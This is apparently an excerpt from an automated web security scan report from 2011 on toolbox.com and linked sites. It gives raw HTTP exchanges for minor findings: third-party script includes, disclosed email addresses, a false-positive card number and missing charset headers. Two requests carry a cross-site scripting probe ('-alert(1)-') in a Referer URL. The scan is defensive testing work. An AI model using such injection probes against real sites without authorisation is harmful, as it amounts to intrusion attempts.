The response dynamically includes the following script from another domain:
https://ssl.google-analytics.com/urchin.js
Request
GET /signupgroup/Welcome_IB.aspx HTTP/1.1 Host: www.industrybrains.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 26 Jan 2011 14:57:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27815
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <!-- $Id: welcome_ib.aspx,v 1.3.8.1 2009-07-29 02:45:22 chris Exp $ --> <html> <head> <title>Marchex Adhere, LLC - Premium Performa ...[SNIP]... <!-- Google Analytics script --> <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://t5.trackalyzer.com/trackalyze.js
Request
GET /products/desktop-central/index.html HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:01 GMT Server: Apache Last-Modified: Mon, 24 Jan 2011 13:46:19 GMT ETag: "16060-d315c0c0" Accept-Ranges: bytes Content-Length: 90208 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:01 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan ...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script> ...[SNIP]...
GET /products/service-desk/index.html?ibad HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:03 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 15:24:32 GMT ETag: "fa73-502d2c00" Accept-Ranges: bytes Content-Length: 64115 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:03 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
GET /us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1 Host: www.netapp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 26 Jan 2011 14:55:02 GMT X-Server-Name: dv-c1-r1-u14-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 26 Jan 2011 14:57:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cae_browser=desktop; path=/; domain=.netapp.com Content-Length: 104728
GET /cringely/pulpit/ HTTP/1.1 Host: www.pbs.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:09 GMT Server: Apache/2.2.17 (Unix) Set-Cookie: www.apache.sid=a407b02ae7db3726c0e6bb20994d70e7; path=/; domain=.pbs.org Accept-Ranges: bytes Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33427
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]... <div class="sidebarbox"> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://www.google-analytics.com/urchin.js
Request
GET / HTTP/1.1 Host: www.roughtype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:11 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 55567
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <META N ...[SNIP]... <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.roughtype.com/rsd.xml" />
GET / HTTP/1.1 Host: www.socialcustomer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /features/ HTTP/1.1 Host: www.spiceworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:12 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: swcls=173.193.214.243.1296053832148878; path=/; domain=.spiceworks.com X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20485
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /Feedback.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 24211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x4f3gn55elbncwac4bzxhvnv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:46 GMT Connection: close
GET /PrivacyPolicy.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35183 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ooszoo554q0sbqbgcenmvfuw; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
GET /TermsofUse.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46350 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3xmjev553fihez45e2oo2ivi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
GET /about/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 22640 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=orhdbf455xhzzen32ok4mn2c; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> About Toolb ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]...
GET /careers/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19781 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=w25wtxbkl34gxdreyk40jymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
GET /contact/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=icbksg45hpzrcf55h0vo2x45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Contact Too ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]...
GET /it/advertising/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 26971 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Advertis ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]...
GET /news/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21896 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ugckar45ukzeih55dzbcsf45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
id@Ls.tc
Request
GET /BUILD_1414/js/omniture.js HTTP/1.1 Host: icdn.toolbox.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday/?c2483'-alert(1)-'56ce208cc66=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 200 OK x-amz-id-2: bFRqQzStmIwdHIGWI95oqP/weROfycbuR1jmUMS//iqwO5JVs+3YrFTcOU1wtayA x-amz-request-id: 88234B988CB19770 Date: Wed, 19 Jan 2011 17:55:12 GMT Last-Modified: Wed, 19 Jan 2011 17:44:22 GMT ETag: "09f0075d94254dd4d6983c8468632401" Accept-Ranges: bytes Content-Type: application/x-javascript Content-Length: 19799 Server: AmazonS3 Age: 71650 X-Cache: Hit from cloudfront X-Amz-Cf-Id: ad8db042a6a2d059b762895e3d18e23e971323af293671e34a7a04b9cc210859d948fc5fbc6f01b8 Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 1498073e9b9d776e833364cb193e1819.cloudfront.net:11180 (CloudFront) Connection: keep-alive
var s=s_gi(s_account);s.currencyCode="USD";s.trackDownloadLinks=true;s.trackExternalLinks=true;s.trackInlineStats=true;s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,wmv,pdf,doc,docx,xls,xlsx,pp ...[SNIP]... `j+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.flush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;s.b= ...[SNIP]...
The following email address was disclosed in the response:
id@Ls.tc
Request
GET /BUILD_1414/js/z.omniture.js HTTP/1.1 Host: icdn.toolbox.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK x-amz-id-2: J2JsUcUNvC5TGCeHtwe/wn8PFYV8oCruVhNeOXB3jDA3GIIQa8jWVA3dV/EaeN71 x-amz-request-id: 3BD3627D3016C172 Date: Wed, 26 Jan 2011 00:45:27 GMT Cache-Control: max-age=315360000 Expires: Thu, 31 Dec 2037 23:55:55 GMT Last-Modified: Wed, 19 Jan 2011 17:44:22 GMT ETag: "6271248ad94490a7cbd4afc6c71b520b" Accept-Ranges: bytes Content-Type: application/x-javascript Server: AmazonS3 Age: 50643 X-Cache: Hit from cloudfront X-Amz-Cf-Id: 7fa993494def2f0624604fc157383e4ecadc91cc733ee6d74d7b3c73bc59d6d8de04cc3af6208346 Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 1498073e9b9d776e833364cb193e1819.cloudfront.net:11180 (CloudFront) Connection: keep-alive Content-Length: 19799
var s=s_gi(s_account);s.currencyCode="USD";s.trackDownloadLinks=true;s.trackExternalLinks=true;s.trackInlineStats=true;s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,wmv,pdf,doc,docx,xls,xlsx,pp ...[SNIP]... `j+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.flush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;s.b= ...[SNIP]...
The following email address was disclosed in the response:
JobCenter@Toolbox.com
Request
GET /jobs/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 40888 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:48 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Jobs </tit ...[SNIP]... <li>Save money with volume discounts for multiple job postings. Please call 888.922.8302 ext. 3 or e-mail JobCenter@Toolbox.com for more information.</li> ...[SNIP]...
The following email address was disclosed in the response:
me@email.com
Request
GET / HTTP/1.1 Host: sethgodin.typepad.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email address was disclosed in the response:
sales@marchex.com
Request
GET /signupgroup/Welcome_IB.aspx HTTP/1.1 Host: www.industrybrains.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 26 Jan 2011 14:57:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27815
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <!-- $Id: welcome_ib.aspx,v 1.3.8.1 2009-07-29 02:45:22 chris Exp $ --> <html> <head> <title>Marchex Adhere, LLC - Premium Performa ...[SNIP]... <a href="mailto:sales@marchex.com"> ...[SNIP]...
The following email address was disclosed in the response:
legaldept@executiveboard.com
Request
GET /PrivacyPolicy.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35183 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ooszoo554q0sbqbgcenmvfuw; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox.com ...[SNIP]... al questions or concerns about this Policy, please feel free to contact us at Chief Compliance Officer, The Corporate Executive Board, 1919 North Lynn Street, Arlington, Virginia 22209; or email us at legaldept@executiveboard.com</li> ...[SNIP]...
The following email address was disclosed in the response:
legaldept@executiveboard.com
Request
GET /TermsofUse.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46350 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3xmjev553fihez45e2oo2ivi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox.com ...[SNIP]... <p>Please contact legaldept@executiveboard.com, using the subject line ...Toolbox.com Terms of Use Question... if You have any questions or comments about the Terms, or to report user conduct violating the Terms.</p> ...[SNIP]...
The following email address was disclosed in the response:
advertising@toolbox.com
Request
GET /it/advertising/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 26971 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Advertis ...[SNIP]... <a href="mailto:advertising@toolbox.com">advertising@toolbox.com</a> ...[SNIP]... <a href="mailto:advertising@toolbox.com">advertising@toolbox.com</a> ...[SNIP]...
The following credit card number was disclosed in the response:
4941944497111040
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
Request
GET /toolboxdotcom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:29 GMT Server: hi Status: 200 OK X-Transaction: 1296053789-52552-6574 ETag: "cba3bfc96bf68c050adb0ae164dc8175" Last-Modified: Wed, 26 Jan 2011 14:56:29 GMT X-Runtime: 0.01600 Content-Type: text/html; charset=utf-8 Content-Length: 51936 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053788039947; path=/; expires=Wed, 02-Feb-11 14:56:28 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY4MmYzNTRlZWE2MzBkYjZlMzAxMGM2YmExZmIzMTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbmHTwi0B--5f068f484769ee483f9eaf437005d73e90b46f16; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... <a href="http://twitter.com/B2Bspecialist/status/4941944497111040"> ...[SNIP]...
14. HTML does not specify charsetpreviousnext There are 9 instances of this issue:
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /BUILD_1414/ HTTP/1.1 Host: cdn.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D;
GET /blogs/ppmtoday/categories/future+states/2379 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
GET /blogs/ppmtoday/categories/recommended+reading/1191 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:12 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
GET /blogs/ppmtoday/categories/thinking+out+loud/2765 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:16 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
GET /blogs/ppmtoday/categories/war+stories/1192 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:17 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
GET /blogs/ppmtoday/categories/white+papers/1193 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:17 GMT Connection: close Content-Length: 103
The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
GET /click HTTP/1.1 Host: links.industrybrains.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
